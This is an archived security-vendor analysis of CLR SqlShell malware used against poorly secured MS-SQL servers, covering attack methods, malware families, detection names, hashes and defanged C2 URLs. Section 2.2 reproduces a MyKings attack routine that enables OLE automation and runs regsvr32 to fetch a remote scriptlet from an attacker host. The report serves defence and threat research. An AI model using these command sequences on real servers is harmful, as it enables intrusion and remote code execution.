{ "id": "0026b5c6-a611-41c7-9034-cff1b6addace", "created_at": "2026-04-06T00:12:19.092301Z", "updated_at": "2026-04-10T03:22:09.959376Z", "deleted_at": null, "sha1_hash": "c2e50be006824ea9f322d2687130a3e633a14182", "title": "Analysis of CLR SqlShell Used to Attack MS-SQL Servers - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6230025, "plain_text": "Analysis of CLR SqlShell Used to Attack MS-SQL Servers - ASEC\r\nBy ATCP\r\nPublished: 2023-05-01 · Archived: 2026-04-05 14:09:41 UTC\r\nThis blog post will analyze the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to\r\nWebShell, which can be installed on web servers, SqlShell is a malware strain that supports various features after\r\nbeing installed on an MS-SQL server, such as executing commands from threat actors and carrying out all sorts of\r\nmalicious behavior. MS-SQL servers support a method known as CLR Stored Procedure which allows the usage\r\nof expanded features, and SqlShell is a DLL created with this method. CLR Stored Procedure is one of the major\r\nmethods that threat actors can use to execute malicious commands in MS-SQL servers along with the xp_cmdshell\r\ncommand.\r\nWhile CLR Stored Procedure contains a feature to execute given commands, it is possible that SqlShell was\r\ncreated for a legitimate purpose. However, it is being used in almost all attacks that target MS-SQL servers. Threat\r\nactors typically use SqlShell as a means to ultimately install malware such as CoinMiner or ransomware. In this\r\nblog post, we will analyze and cover the features supported by various types of SqlShells and the actual cases\r\nwhere they were used in attacks.\r\n1. Overview\r\nMS-SQL servers with simple passwords and are open publicly to the external internet are one of the main attack\r\nvectors used when targeting Windows systems. Threat actors find poorly managed MS-SQL servers and scan them\r\nbefore carrying out brute force or dictionary attacks to log in with admin privileges. Once the threat actors have\r\nreached this point, they then utilize various means to install malware and gain control over the infected systems.\r\nAfter a threat actor logs in to an MS-SQL server with an admin account, the most common method used to install\r\nmalware involves the xp_cmdshell command. Malicious commands that can even function in a Windows\r\nenvironment can be executed through this command. In addition, other means to execute Windows commands\r\nexist, such as registering commands to the OLE Stored Procedure or registering malicious commands in the task\r\ncalled MS-SQL Agent Jobs. Aside from the aforementioned command execution method, another technique exists\r\nwhere an executable implemented with specific features is created, registered, and made to perform those specific\r\nfeatures. MS-SQL servers support Extended Stored Procedure and CLR Stored Procedure DLLs for those\r\nexpanded features, allowing for certain features to be provided as developers create and register DLLs with their\r\ndesired features.\r\nAhnLab Security Emergency response Center (ASEC) has published quarterly statistics through the ASEC Report\r\non malware strains that have been used in attacks against poorly managed MS-SQL servers. [1] According to the\r\nstatistics, there is a considerable amount of malware categorized as CLR Shell (SqlShell). All of these are malware\r\nin the form of CLR Stored Procedure DLLs. Instead of using these pieces of malware on their own, most threat\r\nactors use them during the installation process of other malware, such as ransomware and CoinMiner.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 1 of 16\n\nThe above figure covers the features provided by MS-SQL servers that can execute Windows OS commands and\r\ncategorizes them by their actual malware. SqlShells come in various forms, some of which can execute\r\ncommands, download/upload files, and even perform privilege escalation. Naturally, instead of receiving the\r\nthreat actor’s commands, they also come in the form of downloaders that download and install malware from\r\nspecific URLs.\r\n2. Attack Methods Against MS-SQL\r\nGenerally, threat actors and malware search for environments where the MS-SQL service has been installed by\r\nscanning for servers with open 1433 ports. After the scanning process, they attempt to log in to the confirmed MS-SQL server through brute force or dictionary attacks. Additionally, most features that make it possible to execute\r\nWindows OS commands require an SQL Admin (sa), in other words, an admin account.\r\nThere are cases where the threat actor does not personally perform the scan and dictionary attack, but instead, the\r\nmalware spreads by self-propagating to poorly managed MS-SQL servers. The most notable in this case is the\r\nLemonDuck CoinMner. The following is a list of sa account passwords used by LemonDuck when performing\r\ndictionary attacks.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 2 of 16\n\nIn addition, while LemonDuck uses dictionary attacks on MS-SQL servers during its internal propagation process,\r\nalso known as lateral movement, Kingminer [2] and Vollgar CoinMiner [3] employ brute force attacks on\r\nexternally accessible MS-SQL servers.\r\nAfter obtaining an sa account or sa account privileges, the threat actor or malware either executes malicious\r\ncommands or installs the actual malware to obtain control over the infected system. Additionally, sa account\r\nprivileges only grant control over the MS-SQL database servers, and not the Windows OS itself. In other words,\r\nalthough the execution of SQL commands is allowed, features that can directly impact the Windows OS are not\r\nprovided by default.\r\nHowever, MS-SQL provides various features that allow the execution of OS commands in the Windows OS.\r\nExploiting this ultimately allows the execution of OS commands. The section below will cover the methods that\r\nallow the execution of OS commands through MS-SQL database servers. These features have security\r\nvulnerabilities as they are not default SQL commands, so a majority of them are disabled by default. However,\r\nadmin accounts can enable these settings, meaning that logging in to an admin account makes it possible to access\r\nthese features. Therefore, control over a Windows OS can be obtained as a result of acquiring an sa account.\r\n2.1. xp_cmdshell\r\nxp_cmdshell commands have a feature that executes commands received as arguments in Windows shell.\r\nWindows commands executed as xp_cmdshell commands are run via “cmd.exe /c” commands by the sqlservr.exe\r\nprocess.\r\nOut of the actual malware, LemonDuck downloads additional malware by utilizing xp_cmdshell. LemonDuck is\r\nalso prepared for cases where xp_cmdshell is unregistered instead of disabled as it also includes a re-registration\r\nprocess.\r\n2.2. OLE Stored Procedure\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 3 of 16\n\nThe method that uses the OLE Stored Procedure involves exploiting OLE’s feature to execute other applications.\r\nIn this case, the other applications being the malicious commands or malware. OLE is also disabled like the\r\nxp_cmdshell commands, so it must be enabled as well.\r\nThe following is a reproduction of the actual attack routine used by the MyKings CoinMiner malware.\r\nCMD \u003e sqlcmd -S [IP 주소] -U sa -P testsql\r\n1\u003e sp_configure ‘show advanced options’, 1;\r\n2\u003e RECONFIGURE;\r\n3\u003e go\r\n1\u003e sp_configure ‘Ole Automation Procedures’,1;\r\n2\u003e RECONFIGURE;\r\n3\u003e go\r\n1\u003e DECLARE @shell INT\r\n2\u003e EXEC SP_OAcreate ‘{72C24DD5-D70A-438B-8A42-98424B88AFB8}’,@shell OUTPUT\r\n3\u003e EXEC SP_OAMETHOD @shell,’run’,null, ‘regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct\r\nscrobj.dll’;\r\n4\u003e go\r\n2.3. MS-SQL Agent Jobs\r\nLike the method mentioned above, using the feature called MS-SQL Agent Jobs allows the registration of tasks\r\nthat execute Windows commands. SQL Server Agent supports the simple CmdExec method that executes OS\r\ncommands, and the ActiveScripting method that makes it possible to use JS or VBS scripts.\r\n2.4. Extended Stored Procedure\r\nMS-SQL servers support a method called the Extended Stored Procedure in order to provide an expanded range of\r\nfeatures. Threat actors create malicious DLLs, registers them with the sp_addextendedproc command, and then\r\nexecutes the export function of the DLLs to load the malicious DLL and run the export function responsible for\r\nmalicious behavior.\r\n2.5. CLR Stored Procedure\r\nThe CLR Stored Procedure is similar to the above Extended Stored Procedure, but it can be distinguished by its\r\nuse of .NET DLLs. In addition, an activation process like xp_cmdshell is required to register and use the CLR\r\nStored Procedure.\r\nAs mentioned above, LemonDuck uses not only xp_cmdshell, but also the CLR Stored Procedure.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 4 of 16\n\n3. CLR SqlShell Analysis\r\n3.1. Basic Type\r\nIn this section, SqlShells that only provide basic features such as command execution and file download will be\r\ncovered. SqlShell is often used to install additional malware during attack processes, so even these simple forms\r\nare often found during attacks.\r\n3.1.1. Command Execution (LEMONDUCK)\r\nLemonDuck registers and uses the ExecCommand() method of the StoredProcedures class, and the\r\nExecCommand() method calls the RunCommand() method internally. With the name evilclr.dll, its only\r\nfunctionality is a command execution routine. LemonDuck uses the CLR assembly’s ExecCommand() function\r\nregistered in this way to download additional payloads.\r\n3.1.2. Download Command Support (SHAW20211224)\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 5 of 16\n\nNext is an SqlShell named “shaw20211224.dll” which provides not only the RunCommand() function that\r\nexecutes received commands, but also the DownloadRun() function that downloads external files, and the\r\nPutDatas() function that steals files from the received directories.\r\n3.1.3. Shellcode Execution (Metasploit)\r\nAdditionally, Metasploit, a penetration testing tool, also supports attacks that target these MS-SQL servers.\r\nMetasploit provides various techniques ranging from the aforementioned dictionary attacks and privilege\r\nescalation, to executing various OS commands, and of course, the CLR SqlShell technique is also provided.\r\nMetasploit installs the following SqlShell during the attack process, which is responsible for executing the\r\nreceived shellcode in the memory. Metasploit also provides simple forms of reverse shell, bind shell, and the\r\nMeterpreter backdoor which provides various other features. Metasploit executes a shellcode that installs the\r\nthreat actor’s desired malware.\r\nThe following figure is a log from our AhnLab Smart Defense (ASD), which displays a threat actor breaching a\r\npoorly managed MS-SQL server and installing Metasploit’s “SqlClrPayload.dll” before executing the Metasploit’s\r\nMeterpreter backdoor in the memory of the sqlservr.exe process.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 6 of 16\n\n3.2. Types That Provide Extended Features\r\nThe SqlShells covered above have relatively simple forms, but threat actors are capable of utilizing SqlShells with\r\na much broader range of features. The more features that are provided, the easier it becomes for threat actors to\r\nperform malicious behaviors such as malware installation.\r\n3.2.1. SQLHELPER (TRIGONA Ransomware)\r\nMost notably, an SqlShell named SqlHelper is also often used in attacks. Due to the high number of variations, it\r\nis believed that the source code is publicly available. Even the relatively simple malware below provides various\r\nfeatures such as command execution, adding user accounts, tunneling, and file handling.\r\nIn addition, the SqlShell found in the previously covered Trigona ransomware [4] attack case was also SqlHelper.\r\nThe SqlHelper used by the Trigona threat actor also contains an MS16-032 vulnerability attack routine for\r\nprivilege escalation. The threat actor used this to execute the MS-SQL service with escalated privileges, and with\r\nthat privilege, they registered the Trigona ransomware to the service.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 7 of 16\n\n3.2.2. CLRSQL (SHADOWFORCE Threat Group)\r\nThe SqlShell named CLRSQL is also similar to SqlHelper. When looking at the supported functions, such as tasks\r\nrelated to files/directories/processes/accounts, its similarity to WebShell malware is apparent.\r\nWhen compared to the types covered above, CLRSQL SqlShells have even more features. For example, there are\r\nsome that have been implemented with PingCastle. PingCastle is a tool that can be used to collect information\r\nrequired for attacks in Active Directory environments.\r\nCLRSQL SqlShell implemented with PingCastle is also used during the ShadowForce threat group’s attack\r\nprocesses. ShadowForce is a threat group that has been active since 2013. They are known for their attacks\r\nfocused on Korean businesses and agencies. Their tendency to mainly attack MS-SQL servers is one of their\r\ndefining characteristics. [5]\r\nJudging from how other malware that target poorly managed MS-SQL servers are also found in systems attacked\r\nby ShadowForce, it can be inferred that ShadowForce also targets systems that use poor account credentials.\r\nThe ASD log below shows the sequential creation of ShadowForce’s other malware after “Tmp1C4E.tmp”, which\r\nis the SqlShell, has been installed first. As such, ShadowForce uses the CLR Stored Procedure malware to install\r\nadditional malware after breaching poorly managed MS-SQL servers. This flow of events can be observed\r\nsimilarly in most of their attack processes.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 8 of 16\n\n3.2.3. CLR_MODULE (SHADOWFORCE Threat Group)\r\nThe SqlShell named CLR_module is also similar to CLRSQL as it supports PingCastle along with other similar\r\nfeatures. In terms of differences, CLR_module also provides privilege escalation tools such as BadPotato and\r\nEfsPotato in addition to the features provided by CLRSQL. It can be assumed that these additional features are the\r\nreason why there are many cases where CLRSQL is also found during the attack processes of ShadowForce.\r\n3.3. CoinMiner Installation\r\nIn the section above, we covered the form similar to WebShell that would receive and execute specific commands\r\nfrom the threat actor. In this section, the SqlShells self-implemented with certain features will be covered. Most of\r\nthese forms aim to install CoinMiner, and therefore, the SqlShells used in these attacks are usually responsible for\r\nfunctioning as downloaders or droppers.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 9 of 16\n\n3.3.1. MRBMINER\r\nMrbMiner was one of the main CoinMiners that was distributed to MS-SQL servers in the past. [6] It was first\r\nconfirmed in 2020, and it ultimately installs XMRig CoinMiner. The SqlShell used during the installation process\r\nof MrbMiner possesses its own analysis disruption techniques, but unlike the forms mentioned above, it only has a\r\ndownload feature to install MrbMiner.\r\nAlthough they may vary according to the version, the following hard-coded C\u0026C URLs can be directly\r\nconfirmed.\r\n3.3.2. MYKINGS\r\nMyKings CoinMiner is distributed through various means, and is used in several methods of attacks against MS-SQL servers as well. The first method is the OLE Stored Procedure covered above, and there are other methods\r\nlike the following, where CLR assembly is used via the ExecCode.dll file.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 10 of 16\n\nThe SqlStoredProcedure1() method downloads a text file from a specific URL, which contains URLs where\r\nadditional payloads can be downloaded. Afterward, it parses these URLs to install the actual MyKings payload.\r\nExecCode.dll has a simple form like the one shown above, but more complex forms have been discovered among\r\nthe CLR assemblies used by MyKings.\r\nSimilar to ExecCode.dll, MSSqlInterface.dll is also executed through the StoredProcedures class and\r\nSqlStoredProcedure() method, but it also provides additional features. First, it decrypts the C\u0026C URL encoded\r\ninto 0xFA as a 1-byte XOR during its initial routine. It then sends the basic information that has been stolen to the\r\nC\u0026C server regularly on the main loop, and it downloads and executes files and shellcode.\r\n3.3.3. LOVEMINER\r\nAs a CoinMiner that is being distributed to vulnerable MS-SQL servers, LoveMiner has been found with\r\ndownloaders in the form of exe executables and CLR Stored Procedure. [7]\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 11 of 16\n\nThe LoveMiner downloader accesses a specific URL where it downloads and saves a Base64 encoded CoinMiner\r\nin the “C:\\windows\\temp\\0c0134c0cbebf48be8c95920f5ea74fc.txt” path. If the file already exists, it reads and\r\ndecodes it in Base64, and loads it into the memory.\r\nAfter ultimately loading the CoinMiner DLL, the ExecSql() export function is called with the argument. This DLL\r\nis a customized XMRig that checks if the first string received as an argument is “getmoney#2021”. Afterward, it\r\nmines for Monero coins after parsing the mining pool address and ID received as the third argument.\r\nAmong the SqlShells that install LoveMiner, some even come in the form of a dropper instead of a downloader.\r\nXMRig CoinMiner is saved in the “gmp” internal resources, and SqlShell is responsible for loading this in the\r\nmemory. As a customized XMRig, gmp configures the information required for mining like the mining pool\r\naddress from the initial routine.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 12 of 16\n\n3.4. Proxyware Installation\r\nProxyware is a program that shares a part of the Internet bandwidth that is currently available on a system to\r\nothers. Users who install the program are usually paid with a certain amount of cash in exchange for providing the\r\nbandwidth. While users can earn some money from installing proxyware on their systems, they should know they\r\nare taking risks by allowing external users to perform certain behaviors by using their networks. For instance,\r\nusers cannot know in detail the companies that the proxyware platforms claim to use their services. Even if they\r\ncan verify their customers on their own, it is impossible to check if your bandwidth will be maliciously exploited\r\nin the future or not.\r\nMalware that installs proxyware without the consent of users have been covered before here in the ASEC\r\nBlog. [8] Systems that are infected with the malware have their network bandwidth stolen for threat actors to gain\r\nprofit. The method of earning profit by using the infected system’s resources is similar to that of CoinMiner.\r\nAs can be seen in the ASD log, the threat actor installed a proxyware with the name “sdk.mdf” in an MS-SQL\r\nserver and used an SqlShell to execute the proxyware and steal bandwidth. “sdk.mdf” is the DLL file responsible\r\nfor the actual features, and the file itself only possesses the features provided by proxyware platforms.\r\nHowever, the “Tmp417C.tmp” SqlShell that is created together loads the proxyware “sdk.mdf” and calls the\r\np2p_start() export function so that it operates without users knowing. When calling p2p_start(), the email address\r\nto receive the profits must be transferred as an argument, and the threat actor’s email address can be confirmed in\r\nthe following figure.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 13 of 16\n\nAdditionally, the name of the SqlShell is “SqlServerWorks.CLR.P2P.dll”, which is similar to LoveMiner’s\r\nSqlShell, and it is assumed that they belong to the same threat actor as actual ASD logs have shown that\r\nLoveMiner and proxyware are often installed together.\r\n4. Conclusion\r\nRecently, the SqlShell malware is being installed on poorly managed MS-SQL database servers. SqlShell can\r\ninstall additional malware such as backdoors, CoinMiners, and proxyware, or it can execute malicious commands\r\nreceived from threat actors in a way similar to WebShell.\r\nTypical attacks that target MS-SQL database servers include brute force and dictionary attacks on systems where\r\naccount credentials are poorly managed. In the case of MS-SQL servers that are targeted for attacks, there are\r\nmany cases where they are installed together during the installation process of ERP and business solutions, in\r\naddition to being directly constructed as database servers.\r\nBecause of this, administrators should use passwords that are difficult to guess for their accounts and change them\r\nperiodically to protect the database server from brute force attacks and dictionary attacks, and update to the latest\r\npatch to prevent vulnerability attacks. They should also use security programs such as firewalls for database\r\nservers accessible from outside to restrict access by threat actors.\r\nFile Detection\r\n– CoinMiner/Win.Generic.R503247 (2022.07.08.00)\r\n– CoinMiner/Win.Generic.R531037 (2022.10.20.02)\r\n– CoinMiner/Win.Generic.R548410 (2023.01.04.01)\r\n– Downloader/Win.MyKings.C2097492 (2022.03.28.03)\r\n– Downloader/Win.MyKings.C4262789 (2022.03.28.03)\r\n– Malware/Win.Generic.C4624149 (2021.09.06.02)\r\n– Trojan/Win.Generic.C4819385 (2021.12.08.01)\r\n– Trojan/Win.Generic.C4977493 (2022.02.22.00)\r\n– Trojan/Win.LEMONDUCK.C4206511 (2022.02.17.01)\r\n– Trojan/Win.SqlShell.C4975954 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.C4975955 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.C4975957 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.C4975960 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.C4975962 (2022.02.18.01)\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 14 of 16\n\n– Trojan/Win.SqlShell.C5109399 (2022.05.02.01)\r\n– Trojan/Win.SqlShell.C5271966 (2022.10.04.02)\r\n– Trojan/Win.SqlShell.C5310256 (2022.11.21.03)\r\n– Trojan/Win.SqlShell.C5310259 (2022.11.21.03)\r\n– Trojan/Win.SqlShell.R473182 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.R473183 (2022.02.18.01)\r\n– Trojan/Win.SqlShell.R489848 (2022.05.02.01)\r\n– Trojan/Win.SqlShell.R535294 (2022.11.21.03)\r\n– Trojan/Win.SqlShell.R546675 (2022.12.28.03)\r\n– Trojan/Win.SqlShell.R549834 (2023.01.09.03)\r\n– Trojan/Win.SqlShell.R567705 (2023.04.04.01)\r\n– Trojan/Win.SqlShell.R576151 (2023.05.02.02)\r\nMD5\r\n012e607f99ecc5b108b292d72938456a\r\n130d2b07a1c4cde8f0804df9fa9622d4\r\n15c87480e0405b41f675222ef2bea95a\r\n17606de13187c780ad3bf6caf2d1bd8c\r\n1e92e397d0ad3d8006d99f81d913ffa1\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//54[.]36[.]10[.]73[:]1001/\r\nhttp[:]//88[.]214[.]26[.]9[:]13785/\r\nhttp[:]//adminserver[.]online[:]1001/\r\nhttp[:]//c[.]getmoney[.]company/CLRV7/data[.]txt\r\nhttp[:]//c[.]getmoney[.]company/CLRV7/ver[.]txt\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 15 of 16\n\nSource: https://asec.ahnlab.com/en/52479/\r\nhttps://asec.ahnlab.com/en/52479/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://asec.ahnlab.com/en/52479/" ], "report_names": [ "52479" ], "threat_actors": [], "ts_created_at": 1775434339, "ts_updated_at": 1775791329, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c2e50be006824ea9f322d2687130a3e633a14182.pdf", "text": "https://archive.orkl.eu/c2e50be006824ea9f322d2687130a3e633a14182.txt", "img": "https://archive.orkl.eu/c2e50be006824ea9f322d2687130a3e633a14182.jpg" } }